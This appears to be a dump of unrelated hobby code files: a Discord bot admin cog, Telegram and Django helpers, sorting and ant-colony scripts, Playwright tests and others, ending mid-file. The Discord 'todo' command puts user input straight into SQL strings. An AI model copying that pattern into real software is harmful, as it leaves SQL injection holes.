self.client.get_cog(name.split('.')[-1])\n try:\n await cog.reloadSetup()\n except AttributeError:\n await ctx.send(\":x: Cog not support megareload!\") \n return\n\n await ctx.send(\":white_check_mark:\")\n\n @commands.command()\n @checks.check_author()\n async def megarecache(self, ctx, *args):\n \"\"\"\n Use the exact name of the database (model_npc, etc.)\n In order to use this in a cog, that cog must have:\n - dict\n - a cache function correspond to a DBC's name in the dict. (e.g. {'model_NPC': self.cacheNPC})\n - a function\n For example, please refer to cogs.avasoul_pack.avaNPC\n \"\"\"\n\n temp = []\n name = ''\n try:\n for n in args[0].split('.'):\n if n == 'c': temp.append('cogs'); continue\n elif n == 'a': temp.append('avasoul_pack'); continue\n temp.append(n)\n name = '.'.join(temp)\n except IndexError: await ctx.send(\":x: Missing cog's name (Note: No `c.a`, only `name` (e.g. `avaPersonal`, NOT `c.a.avaPersonal`))\"); return\n\n cog = self.client.get_cog(name)\n print(name, cog)\n try:\n if args[1] == 'all':\n await cog.cacheAll()\n else:\n await cog.cacheMethod[args[1]]()\n except AttributeError: await ctx.send(\":x: Cog not found. (Note: No `c.a`, only `name` (e.g. 
`avaPersonal`, NOT `c.a.avaPersonal`))\"); return\n except IndexError: await ctx.send(\":x: Missing database name\"); return\n except KeyError: await ctx.send(\":x: DB not found\"); return\n # except AttributeError: await ctx.send(\":x: Unknown cog\"); return\n\n await ctx.send(\":white_check_mark:\")\n\n @commands.command()\n @checks.check_author()\n async def megarestart(self, ctx, *args):\n await ctx.send(f\" **Okai!**\")\n os.system(\"python C:/Users/DELL/Desktop/bot_cli/aaaa.py\")\n exit()\n # await client.logout()\n\n @commands.command()\n @checks.check_author()\n async def leave_guild(self, ctx):\n await ctx.send(\"Okay.......\")\n await ctx.guild.leave()\n\n @commands.command()\n @checks.check_author()\n async def shutdown(self, ctx):\n await ctx.send(f\":wave: Bot's successfully shut down by {ctx.message.author}!\")\n exit()\n\n\n\n # ================= MISC ====================\n @commands.command()\n @checks.check_author()\n async def statas(self, ctx, *args):\n mem = psutil.virtual_memory()\n\n temb = discord.Embed(title=f\" {self.bytes2human(mem.used)}/{self.bytes2human(mem.total)} ({round(mem.used/mem.total*100)}%)\", colour = discord.Colour(0xB1F1FA))\n\n await ctx.send(embed=temb)\n\n @commands.command(hidden=True)\n @checks.check_author()\n async def sql(self, ctx, *, query):\n\n query = self.utils.cleanup_code(query)\n\n try:\n if not await self.client._cursor.execute(query): await ctx.send(\":x: No effect\")\n except mysqlError.ProgrammingError: await ctx.send(\":x: Invalid syntax!\"); return\n\n # Fetch whatever the statement produced (empty for non-SELECT statements).\n results = await self.client._cursor.fetchall()\n if not results: return\n\n # Render with tabulate, which is already imported at module level.\n fmt = f'```\\n{tabulate(results)}\\n```'\n if len(fmt) > 2000:\n fp = BytesIO(fmt.encode('utf-8'))\n await ctx.send('Too many results...', file=discord.File(fp, 'results.txt'))\n else:\n await ctx.send(fmt)\n\n @commands.command()\n @checks.check_author()\n async def get_imgur(self, ctx, *args):\n if args:\n # Accept only links that contain a known image extension.\n if not any(ext in args[0] for ext in ('.png', '.jpg', '.jpeg', '.gif')):\n await ctx.send(f\"<:osit:544356212846886924> {ctx.message.author.mention}, invalid link!\"); return\n else: source = args[0]\n else:\n package = ctx.message.attachments\n if package: source = package[0].proxy_url\n else: return\n\n resp = await self.client.loop.run_in_executor(None, self.client.thp.imgur_client.upload_from_url, source)\n reembed = discord.Embed(description=f\"{resp['link']}\", colour = discord.Colour(0x011C3A))\n reembed.set_image(url=resp['link'])\n await ctx.send(embed=reembed)\n\n @commands.command()\n @checks.check_author()\n async def todo(self, ctx, *args):\n if not args:\n bundle = await self.client.quefe(\"SELECT taime, content, id FROM tz_todo\", type='all')\n line = '\\n'\n\n try:\n for pack in bundle:\n line = line + f\"**━{pack[2]}━━━━━{pack[0]}━━━**\\n{pack[1]}\\n\"\n except TypeError:\n line = line + f\"**━{bundle[2]}━━━━━{bundle[0]}━━━**\\n{bundle[1]}\\n\"\n\n reembed = discord.Embed(description=line, color=discord.Colour(0xB1F1FA))\n await 
ctx.send(embed=reembed, delete_after=20); return\n\n if args[0] in ['create', 'add', 'make']:\n content = ' '.join(args[1:])\n create_point = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n await self.client._cursor.execute(f\"INSERT INTO tz_todo VALUES (0, '{content}', '{create_point}')\")\n await ctx.send(\":white_check_mark: Done\"); return\n elif args[0] == 'delete':\n try: \n if await self.client._cursor.execute(f\"DELETE FROM tz_todo WHERE id='{args[1]}';\") == 0:\n await ctx.send(\"Id not found\"); return\n except IndexError: await ctx.send(\"Hey you, I need an id.\"); return\n await ctx.send(f\"Deleted todo `{args[1]}`\")\n\n @commands.command()\n @checks.check_author()\n async def delele(self, ctx, *args):\n \"\"\"Delete message\"\"\"\n try:\n msg = await ctx.channel.fetch_message(int(args[0]))\n await msg.delete()\n # E: Invalid args\n except ValueError: await ctx.send(\":warning: Invalid **`message id`**\"); return\n # E: Msg not found\n except discordErrors.NotFound: await ctx.send(\":warning: Message not found!\"); return\n # E: No permission\n except discordErrors.Forbidden: await ctx.send(\"No you can't <:fufu:508437298808094742>\"); return\n\n @commands.command()\n @checks.check_author()\n @commands.cooldown(1, 5, type=BucketType.guild)\n async def countline(self, ctx, *args):\n # dir_main = os.path.dirname(os.path.realpath(__file__))\n dirs = ['cogs', 'data']\n length = 0\n len_img = 0\n\n async def walkthrough(dir_path, pack, prev=''):\n \"\"\"\n length, len_img = pack\n \"\"\"\n dir_path = os.path.join(prev, dir_path)\n for f in os.listdir(dir_path):\n await asyncio.sleep(0)\n if '.' not in f and f not in dirs:\n pack = await walkthrough(f, pack, prev=dir_path)\n\n if f.endswith(\".py\"):\n with open(os.path.join(dir_path, f), 'r', encoding=\"utf8\") as b:\n lines = b.readlines()\n pack[0] += len(lines)\n elif f.endswith('.png') or f.endswith('.jpg'):\n pack[1] += 1\n else:\n continue\n return pack\n\n for dir_path in dirs:\n pack = await walkthrough(dir_path, [length, len_img])\n length, len_img = tuple(pack)\n\n await ctx.send(f\"> **`{length}` lines** of code\\n> **`{len_img}`** image files!\")\n\n @commands.command()\n @checks.check_author()\n async def command_info(self, ctx, *args):\n try:\n await ctx.send(\"> Located in `{}`\".format(self.client.get_command(args[0]).cog.qualified_name))\n except IndexError: await ctx.send(\":x: Missing command's name\"); return\n except AttributeError: await ctx.send(\":x: Command not found!\"); return\n\n\n\n # ================== TOOLS ==================\n\n def bytes2human(self, n):\n # http://code.activestate.com/recipes/578019\n # >>> bytes2human(10000)\n # '9.8K'\n # >>> bytes2human(100001221)\n # '95.4M'\n symbols = ('K', 'M', 'G', 'T', 'P', 'E', 'Z', 'Y')\n prefix = {}\n for i, s in enumerate(symbols):\n prefix[s] = 1 << (i + 1) * 10\n for s in reversed(symbols):\n if n >= prefix[s]:\n value = float(n) / prefix[s]\n return '%.1f%s' % (value, s)\n return \"%sB\" % n\n\n def data_updating(self, update_kw):\n if update_kw == 'time_pack':\n time_pack = (self.client.STONE.year, self.client.STONE.month, self.client.STONE.day, self.client.STONE.hour, self.client.STONE.minute)\n with open('data/time.json', 'w') as f:\n json.dump(time_pack, f, indent=4)\n\n\n\n\n\n\ndef setup(client):\n 
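# Editorial note, not in the original file: this is the standard discord.py extension hook; client.load_extension(\"cogs.avasoul_pack.avaAdmin\") imports this module and calls setup(), which registers the cog below.\n    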
client.add_cog(avaAdmin(client))\n","repo_name":"kaleidocli/bot_cli","sub_path":"cogs/avasoul_pack/avaAdmin.py","file_name":"avaAdmin.py","file_ext":"py","file_size_in_byte":21782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13282209479","text":"import os\nimport random\nimport asyncio\nfrom datetime import datetime, timezone, timedelta\n\n\nclass Apps:\n def __init__(self):\n self.data_path = 'data'\n\n def current_date(self, time_format='%Y-%m-%d %H:%M:%S'): # Текущее время и дата по Москве (Часовой пояс +3)\n offset = timezone(timedelta(hours=3))\n date = datetime.now(offset).strftime(time_format) # time_format('%Y-%m-%d %H:%M:%S')\n return date\n\n def make_folder(self, directory): # Создать папку если она отсутствует в рабочей папке\n os.makedirs(directory, exist_ok=True)\n\n async def send_chat_action(self, bot, chat_id, action='typing', sec=1, text=None): # Уведомление Chat_Action\n await bot.send_chat_action(chat_id, action)\n # action typing/choose_sticker/record_audio/upload_document/upload_photo\n if text is not None:\n if len(text) < 15:\n sec = 1\n elif 15 <= len(text) < 25:\n sec = 2\n elif 25 <= len(text) < 35:\n sec = 3\n elif 35 <= len(text) < 45:\n sec = 4\n else:\n sec = 5\n await asyncio.sleep(sec)\n\n async def send_notification(self, bot, message, chat_id, action):\n # type = reply_message/new_user/new_group/no_time/...\n user_id = str(message.from_user.id)\n username = str(message.from_user.username)\n try:\n full_name = str(f'{message.from_user.first_name} {message.from_user.last_name}')\n except TypeError:\n full_name = str(message.from_user.first_name)\n group_id = str(message.chat.id)[1:]\n group_title = str(message.chat.title)\n message_id = str(message.message_id)\n text = str(message.text)\n notifications = {\n 'reply_message': 'Новое reply сообщение:\\n'\n f'id {group_id} - \"{group_title}\")\\n'\n f'id {user_id} - {full_name} ({username})\\n'\n f'message_id {message_id} - {text}',\n 'new_user': 'Новый пользователь:\\n'\n f'id {user_id} - {full_name} ({username})',\n 'new_group': 'Новая группа:\\n'\n f'id {group_id} - \"{group_title}\")',\n 'no_time': 'У пользователя кончилось время:\\n'\n f'id {user_id} - {full_name} ({username})',\n 'new_vpn_user': 'Появился новый пользователь VPN:\\n'\n f'id {user_id} - {full_name} ({username})',\n 'vpn_user_deleted': 'Пользователь заблокировал свой VPN:\\n'\n f'id {user_id} - {full_name} ({username})',\n 'user_blocked_bot': 'Бот заблокирован следующим пользователем:\\n'\n f'id {user_id} - {full_name} ({username})'\n }\n if action in notifications:\n await bot.send_message(chat_id, notifications[action])\n\n async def echo_voice(self, bot, message, txt_file): # Отправляет случайное сообщение из answers_NAME.tx\n with open(f'{self.data_path}/{txt_file}.txt', 'r') as f:\n lines = f.readlines()\n if random.uniform(0, 1) < 0.25:\n text = random.choice(lines)\n await Apps().send_chat_action(bot, chat_id=message.chat.id, text=text) # Уведомление Chat_Action\n await bot.send_message(message.chat.id, text)\n else:\n return None\n","repo_name":"DrGsan/Audio_DrGBot","sub_path":"apps/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24262267712","text":"import pandas as pd\nfrom dataset.models import pincode\n\ndf = pd.read_csv('pincode1.csv', encoding='utf8', sep=',')\ncount = 0\nfor row in df.itertuples():\n print(count)\n count = count 
+ 1\n obj = pincode.objects.create(pinc=row.pincode, place=row.taluk, district=row.districtname, state=row.statename,\n region=row.regionname, division=row.divisionname)\n","repo_name":"Nandy-Saran/weather-forecast","sub_path":"dataset/setup1.py","file_name":"setup1.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22792890096","text":"import pygame\nfrom random import randint\n\ngap = 10 #竖条的间隔\nwidth = 30 #竖条的宽度\nscreenSize = (600, 250) #显示屏幕的尺寸\nbarXPosition = [] #竖条在坐标轴的位置\nBars = [] #竖条对象列表\n\n#生成颜色\nclass color(object):\n @staticmethod\n def RandomColor():\n r,g,b = randint(0,225),randint(0,255),randint(0,255)\n return (r,g,b)\n @staticmethod\n def CalculateColor(self,num):\n pass\n\nclass bar(object):\n def __init__(self, n,num,screen,width = 30):\n self.n = n\n self.locationX = barXPosition[n]\n self.locationY = screenSize[1]-50-num\n self.num = num\n self.color = color.RandomColor()\n self.width = width\n self.font = pygame.font.Font(None, 20)\n self.screen = screen\n\n #绘制竖条及其上方的数字\n def BarDraw(self):\n pygame.draw.rect(self.screen, self.color,\n ((self.locationX,self.locationY), (self.width, self.num)))\n self.txt = self.font.render(\"{}\".format(self.num), True, self.color)\n self.screen.blit(self.txt, (self.locationX+5,self.locationY-20))\n\n #移动竖条,flag是用于判断移动方向 True向右 False向左\n def move(self,flag):\n pace = 2 #移动的步长\n #消除移动前的竖条\n pygame.draw.rect(self.screen, (255, 255, 235),\n ((self.locationX, self.locationY), (self.width, self.num)))\n if flag:\n self.locationX += pace\n else:\n self.locationX -= pace\n # 绘制移动后的竖条\n pygame.draw.rect(self.screen, self.color,\n ((self.locationX , self.locationY), (self.width, self.num)))\n\n #交换相邻两个竖条\n def ChangeLocation(self,otherBall):\n #清除当前位置图像与文字\n pygame.draw.rect(self.screen, (255, 255, 235),\n ((self.locationX, self.locationY-20), (self.width, self.num+20)))\n pygame.draw.rect(otherBall.screen, (255, 255, 235),\n ((otherBall.locationX, otherBall.locationY - 20), (otherBall.width, otherBall.num + 20)))\n #竖条移动的动画\n for n in range(20):\n self.move(True)\n otherBall.move(False)\n pygame.time.delay(40)\n pygame.display.flip()\n\n #移动后,重新写上竖条对应的数字\n self.screen.blit(self.txt, (self.locationX + 5, self.locationY - 20))\n otherBall.screen.blit(otherBall.txt, (otherBall.locationX + 5, otherBall.locationY - 20))\n\n #交换竖条对象在列表的位置,同时交换排位数字\n Bars[self.n],Bars[otherBall.n] = Bars[otherBall.n],Bars[self.n]\n self.n,otherBall.n = otherBall.n,self.n\n pygame.display.flip()\n pygame.time.delay(200) #此延时控制排序动画的快慢\n\n#冒泡排序\ndef algorithm(nums):\n for i in range(len(nums) - 1):\n for j in range(len(nums) - 1 - i):\n if nums[j] > nums[j + 1]:\n Bars[j].ChangeLocation(Bars[j + 1])\n nums[j], nums[j + 1] = nums[j + 1], nums[j]\n\n#计算十二个竖条在轴上的位置\ndef barX(gap,width,barXs):\n for n in range(12):\n barX = 50 + gap + (gap + width) * n\n barXs.append(barX)\n\ndef main():\n nums = []\n pygame.init()\n screen = pygame.display.set_mode(screenSize)\n pygame.display.set_caption(\"算法\") #标题\n screen.fill((255, 255, 235)) #背景色\n barX(gap,width,barXPosition) #计算bar位置并存于barXs\n pygame.draw.aaline(screen,(0,255,0),(50,screenSize[1]-50),\n (screenSize[0]-50,screenSize[1]-50)) #绘制坐标轴\n pygame.display.flip()\n #生成十二个竖条并绘制\n for n in range(12):\n num = randint(20,160)\n tempBar = bar(n,num,screen)\n tempBar.BarDraw()\n nums.append(num)\n Bars.append(tempBar)\n pygame.time.delay(50) #此处延时是为了开始时演示动画效果\n pygame.display.flip()\n\n algorithm(nums) #排序\n\n #等待关闭窗口事件\n run 
= True\n while run:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\nif __name__ == \"__main__\":\n main()","repo_name":"zetaleee/Visualization-algorithm","sub_path":"algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":4432,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"72731197559","text":"import cv2\nimport numpy as np\n\n\ndef show_image():\n while True:\n img = cv2.imread(\"color.png\")\n cv2.imshow('Estudo OpenCV- Filtro', img)\n ret = cv2.waitKey(1)\n if ret == 27:\n break\n elif ret == -1:\n continue\n\n\ncv2.destroyAllWindows()\n\n\ndef main():\n show_image()\n return 0\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"BillyDeKidII/BrincandoComCodigos","sub_path":"Python/TonsImage/filtro1.py","file_name":"filtro1.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70950505079","text":"from ant_colony.graph import Node, Graph\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nplt.style.context('ggplot2')\n\nfrom math import radians, cos, sin, asin, sqrt\n\n\ndef haversine(lat1, lon1, lat2, lon2): # 经度1,纬度1,经度2,纬度2 (十进制度数)\n \"\"\" \n Calculate the great circle distance between two points \n on the earth (specified in decimal degrees) \n \"\"\"\n # 将十进制度数转化为弧度\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine公式\n dlon = abs(lon2 - lon1)\n dlat = abs(lat2 - lat1)\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6371 # 地球平均半径,单位为公里\n return c * r\n\n\ndf = pd.read_csv(r'D:\\ProgramFiles\\PycharmProjects\\learnpy\\learnscrapy\\week9\\burma14.csv')\n\nfig1 = plt.figure()\nsc = plt.scatter(df['x'], df['y'])\ni = -1\nfor x, y in zip(df['x'], df['y']):\n i += 1\n plt.annotate(\n '({0})'.format(i),\n xy=(x, y),\n xytext=(0, -5),\n textcoords='offset points',\n xycoords='data',\n ha='center',\n va='top')\nnodes = [Node(z.x, z.y) for z in df.itertuples()]\ngraph = Graph(nodes, alpha=1, beta=5, decay=0.2)\n# path, distance = graph.find_shortest_path(n=1, m=28)\nd_list = []\nn_list = list(range(0, 1001, 10))\nshortest = 100000\nfor n in n_list:\n path, distance = graph.find_shortest_path(n=n, m=21)\n if distance < shortest:\n shortest = distance\n path_shortest = path\n d_list.append(distance)\nfig2 = plt.figure()\nplt.plot(n_list, d_list, 'r-')\n\nsum = 0\nfor i in range(len(path_shortest) - 1):\n x1, y1 = df.loc[path_shortest[i]]\n x2, y2 = df.loc[path_shortest[i + 1]]\n real_dis = haversine(x1, y1, x2, y2)\n sum += real_dis\nx0, y0 = df.loc[path_shortest[0]]\nxn, yn = df.loc[path_shortest[-1]]\nsum += haversine(x0, y0, xn, yn)\n\n","repo_name":"kinger310/learnpy","sub_path":"learn_model/learn_ant.py","file_name":"learn_ant.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"28618211453","text":"class Solution:\n def findMaxForm(self, strs: List[str], m: int, n: int) -> int:\n \n @lru_cache(None)\n def count(i,m_left,n_left):\n if i >= len(strs) or m_left < 0 or n_left < 0:\n return 0\n \n size = len(strs[i])\n zeroes = strs[i].count('0')\n ones = size - zeroes\n \n if m_left - zeroes < 0 or n_left - ones < 0:\n return count(i+1,m_left,n_left)\n \n return max(count(i+1,m_left,n_left),1 + count(i+1,m_left-zeroes,n_left-ones))\n \n \n return 
count(0,m,n)","repo_name":"amanuel1271/Problem-Solving","sub_path":"474-ones-and-zeroes/474-ones-and-zeroes.py","file_name":"474-ones-and-zeroes.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"16810609942","text":"\"\"\"\nA view representing an instance of a point of interest. POIs can be created or updated via this view.\n\"\"\"\nimport logging\n\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import PermissionRequiredMixin\nfrom django.shortcuts import render, redirect\nfrom django.utils.decorators import method_decorator\nfrom django.utils.translation import ugettext as _\nfrom django.views.generic import TemplateView\n\nfrom ...constants import status\nfrom ...decorators import region_permission_required\nfrom ...forms.pois import POIForm, POITranslationForm\nfrom ...models import POI, POITranslation, Region, Language\n\nlogger = logging.getLogger(__name__)\n\n\n@method_decorator(login_required, name='dispatch')\n@method_decorator(region_permission_required, name='dispatch')\nclass POIView(PermissionRequiredMixin, TemplateView):\n permission_required = 'cms.manage_pois'\n raise_exception = True\n\n template_name = 'pois/poi_form.html'\n base_context = {'current_menu_item': 'pois'}\n\n def get(self, request, *args, **kwargs):\n\n region = Region.objects.get(slug=kwargs.get('region_slug'))\n language = Language.objects.get(code=kwargs.get('language_code'))\n\n # get poi and translation objects if they exist\n poi = POI.objects.filter(id=kwargs.get('poi_id')).first()\n poi_translation = POITranslation.objects.filter(\n poi=poi,\n language=language,\n ).first()\n\n if poi and poi.archived:\n messages.warning(request, _(\"You cannot edit this POI because it is archived.\"))\n\n poi_form = POIForm(instance=poi)\n poi_translation_form = POITranslationForm(instance=poi_translation)\n\n return render(request, self.template_name, {\n **self.base_context,\n 'poi_form': poi_form,\n 'poi_translation_form': poi_translation_form,\n 'language': language,\n # Languages for tab view\n 'languages': region.languages if poi else [language],\n })\n\n # pylint: disable=too-many-branches,too-many-locals,unused-argument\n def post(self, request, *args, **kwargs):\n\n region = Region.objects.get(slug=kwargs.get('region_slug'))\n language = Language.objects.get(code=kwargs.get('language_code'))\n\n poi_instance = POI.objects.filter(id=kwargs.get('poi_id')).first()\n poi_translation_instance = POITranslation.objects.filter(\n poi=poi_instance,\n language=language,\n ).first()\n\n if poi_instance and poi_instance.archived:\n return redirect('edit_poi', **{\n 'poi_id': poi_instance.id,\n 'region_slug': region.slug,\n 'language_code': language.code,\n })\n\n poi_form = POIForm(\n request.POST,\n instance=poi_instance,\n )\n poi_translation_form = POITranslationForm(\n request.POST,\n instance=poi_translation_instance,\n region=region,\n language=language,\n )\n\n if (\n not poi_form.is_valid() or\n not poi_translation_form.is_valid()\n ):\n\n # Add error messages\n for form in [poi_form, poi_translation_form]:\n for field in form:\n for error in field.errors:\n messages.error(request, _(field.label) + ': ' + _(error))\n for error in form.non_field_errors():\n messages.error(request, _(error))\n\n elif (\n not poi_form.has_changed() and\n not poi_translation_form.has_changed()\n ):\n\n messages.info(request, _('No changes 
detected.'))\n\n else:\n\n poi = poi_form.save(region=region)\n poi_translation_form.save(poi=poi, user=request.user)\n\n published = poi_translation_form.instance.status == status.PUBLIC\n if not poi_instance:\n if published:\n messages.success(request, _('POI was successfully created and published.'))\n else:\n messages.success(request, _('POI was successfully created.'))\n return redirect('edit_poi', **{\n 'poi_id': poi.id,\n 'region_slug': region.slug,\n 'language_code': language.code,\n })\n if published:\n messages.success(request, _('POI was successfully published.'))\n else:\n messages.success(request, _('POI was successfully saved.'))\n\n return render(request, self.template_name, {\n **self.base_context,\n 'poi_form': poi_form,\n 'poi_translation_form': poi_translation_form,\n 'language': language,\n # Languages for tab view\n 'languages': region.languages if poi_instance else [language],\n })\n","repo_name":"digitalfabrik/coldaid-backend","sub_path":"src/cms/views/pois/poi_view.py","file_name":"poi_view.py","file_ext":"py","file_size_in_byte":4969,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"17383835340","text":"try:\n from win32api import GetAsyncKeyState as getState\nexcept ModuleNotFoundError:\n raise Exception(\"You do not have pywin32 installed. Get it from: https://github.com/mhammond/pywin32/releases\")\n\nkey = { #keycodes from the MSDN\n \"TAB\": 9,\n \"ENTER\": 13,\n \"SHIFT\": 16,\n \"CONTROL\": 17,\n \"ALT\": 18,\n \"ESCAPE\": 27,\n \"SPACE\": 32,\n \"LEFT\": 37,\n \"UP\": 38,\n \"RIGHT\": 39,\n \"DOWN\": 40\n}\n\nfor k in range(65,90): #getting key codes for letter keys\n key[chr(k)] = k\n\nfor k in range(48,57): #getting key codes for number keys\n key[chr(k)] = k\n\ndef isPressed(keycode): #simple async keyboard polling function\n return False if getState(keycode) == 0 else True","repo_name":"underscoren/pyCaster","sub_path":"keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19856671705","text":"from playwright.sync_api import Playwright, Page, Route, sync_playwright, expect\nfrom datetime import datetime\nimport os\n\ncurrent_date = datetime.now(tz=None)\ncur_time = current_date.strftime('%m-%d-%Y_%H-%M-%S')\n\n\ndef screenshot(page: Page):\n page.screenshot(path=f\"Screenshots/screenshot_{cur_time}.png\")\n\n\ndef test_add_todo(playwright: Playwright) -> None:\n browser = playwright.chromium.launch(headless=False)\n context = browser.new_context()\n page = context.new_page()\n page.goto(\"https://playwright-todomvc.antonzimaiev.repl.co/#/\")\n page.get_by_placeholder(\"What needs to be done?\").click()\n page.get_by_placeholder(\"What needs to be done?\").fill(\"Создать первый сценарий playwright\")\n page.get_by_placeholder(\"What needs to be done?\").press(\"Enter\")\n\n context.close()\n browser.close()\n\n\ndef test_checkbox(page: Page):\n page.goto('https://checks-radios.antonzimaiev.repl.co/')\n page.locator(\"text=Default checkbox\").check()\n page.locator(\"text=Checked checkbox\").check()\n page.locator(\"text=Default radio\").check()\n page.locator(\"text=Default checked radio\").check()\n page.locator(\"text=Checked switch checkbox input\").check()\n screenshot(page)\n\n\ndef test_select(page: Page):\n page.goto('https://select.antonzimaiev.repl.co/')\n page.select_option('#floatingSelect', value=\"3\")\n page.select_option('#floatingSelect', 
index=1)\n page.select_option('#floatingSelect', label=\"Нашел и завел bug\")\n screenshot(page)\n\n\ndef test_select_multiple(page: Page):\n page.goto('https://select.antonzimaiev.repl.co/')\n page.select_option('#skills', value=[\"playwright\", \"python\"])\n screenshot(page)\n\n\ndef test_select_multiple_file(page: Page):\n page.goto('https://upload.antonzimaiev.repl.co/')\n page.set_input_files(\"#formFile\", \"test.txt\")\n screenshot(page)\n page.locator(\"#file-submit\").click()\n\n\ndef test_drag_and_drop(page: Page):\n page.goto('https://draganddrop.antonzimaiev.repl.co/')\n page.drag_and_drop(\"#drag\", \"#drop\")\n screenshot(page)\n\n\ndef test_dialogs(page: Page):\n page.goto(\"https://dialog.antonzimaiev.repl.co/\")\n page.on(\"dialog\", lambda dialog: dialog.accept())\n page.get_by_text(\"Диалог Confirmation\").click()\n screenshot(page)\n\n\ndef test_download(page: Page):\n\n page.goto(\"https://demoqa.com/upload-download\")\n\n with page.expect_download() as download_info:\n page.locator(\"a:has-text(\\\"Download\\\")\").click()\n\n download = download_info.value\n file_name = download.suggested_filename\n destination_folder_path = \"./Download/\"\n download.save_as(os.path.join(destination_folder_path, file_name))\n\n\ndef test_inner_text(page: Page):\n page.goto('https://table.antonzimaiev.repl.co/')\n row = page.locator(\"tr\")\n print(row.all_inner_texts())\n\n\ndef test_text_content(page: Page):\n page.goto('https://table.antonzimaiev.repl.co/')\n row = page.locator(\"tr\")\n print(row.all_text_contents())\n\n\ndef test_new_tab(page: Page):\n page.goto(\"https://tabs.antonzimaiev.repl.co/\")\n with page.context.expect_page() as tab:\n page.get_by_text(\"Переход к Dashboard\").click()\n\n screenshot(page)\n new_tab = tab.value\n page.pause()\n assert new_tab.url == \"https://tabs.antonzimaiev.repl.co/dashboard/index.html?\"\n sign_out = new_tab.locator('.nav-link', has_text='Sign out')\n screenshot(page)\n assert sign_out.is_visible()\n\n\ndef test_todo(page: Page):\n page.goto('https://demo.playwright.dev/todomvc/#/')\n expect(page).to_have_url(\"https://demo.playwright.dev/todomvc/#/\")\n input_field = page.get_by_placeholder('What needs to be done?')\n expect(input_field).to_be_empty()\n input_field.fill(\"Закончить курс по playwright\")\n input_field.press('Enter')\n input_field.fill(\"Добавить в резюме, что умею автоматизировать\")\n input_field.press('Enter')\n todo_item = page.get_by_test_id('todo-item')\n expect(todo_item).to_have_count(2)\n todo_item.get_by_role('checkbox').nth(0).click()\n expect(todo_item.nth(0)).to_have_class('completed')\n\n\ndef test_listen_network(page: Page):\n page.on(\"request\", lambda request: print(\">>\", request.method, request.url))\n page.on(\"response\", lambda response: print(\"<<\", response.status, response.url))\n page.goto('https://osinit.ru/')\n\n\ndef test_network(page: Page):\n page.route(\"**/register\", lambda route: route.continue_(post_data='{\"email\": \"user\",\"password\": \"secret\"}'))\n page.goto('https://reqres.in/')\n page.get_by_text(' Register - successful ').click()\n\n\ndef test_mock_tags(page: Page):\n page.route(\"**/api/tags\", lambda route: route.fulfill(path=\"data.json\"))\n page.goto('https://demo.realworld.io/')\n\n\ndef test_intercepted(page: Page):\n def handle_route(route: Route):\n response = route.fetch()\n json = response.json()\n json[\"tags\"] = [\"open\", \"solutions\"]\n route.fulfill(json=json)\n\n page.route(\"**/api/tags\", handle_route)\n\n 
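# Editorial sketch of the interception flow above, not from the original test: route.fetch() forwards the request to the real backend, the parsed JSON body is mutated so \"tags\" becomes [\"open\", \"solutions\"], and route.fulfill(json=json) answers the page with the modified payload.\n    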
page.goto(\"https://demo.realworld.io/\")\n sidebar = page.locator('css=div.sidebar')\n expect(sidebar.get_by_role('link')).to_contain_text([\"open\", \"solutions\"])\n\n\ndef test_inventory(page):\n response = page.request.get('https://petstore.swagger.io/v2/store/inventory')\n print(response.status)\n print(response.json())\n\n\ndef test_add_user(page):\n data = [\n {\n \"id\": 9743,\n \"username\": \"fsd\",\n \"firstName\": \"fff\",\n \"lastName\": \"ggg\",\n \"email\": \"bbb\",\n \"password\": \"tt\",\n \"phone\": \"333\",\n \"userStatus\": 0\n }\n ]\n header = {\n 'accept': 'application/json',\n 'content-Type': 'application/json'\n }\n response = page.request.post('https://petstore.swagger.io/v2/user/createWithArray', data=data, headers=header)\n print(response.status)\n print(response.json())\n\n","repo_name":"SergeiKychakov/playwright_autotest","sub_path":"test_todo.py","file_name":"test_todo.py","file_ext":"py","file_size_in_byte":5979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69942314362","text":"\"\"\"\nTitle: Text Categorization with kNN\n\nProject: CSI4107 Project\nVersion: Final System\nComponent: Module 6\n\nCreated: 10 Apr 2020\nLast modified: 13 Apr 2020\n\nAuthor: Tiffany Maynard\nStatus: In Progress\n\nDescription: Assign one or more topics to the Reuters documents that are not assigned any\ntopics\nBased on https://miguelmalvarez.com/2015/03/20/classifying-reuters-21578-collection-with-python-representing-the-data/\n\"\"\"\nimport csv\nimport os\nimport ast\nfrom nltk import word_tokenize\nfrom nltk.stem.porter import PorterStemmer\nimport re\nfrom nltk.corpus import stopwords, reuters\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.neighbors import KNeighborsClassifier\nimport bs4\nimport config\n#Empty globals to store topics so it is only read once from csv\nTOPIC_DICT = {}\n\n\ndef doc_id_by_topic():\n 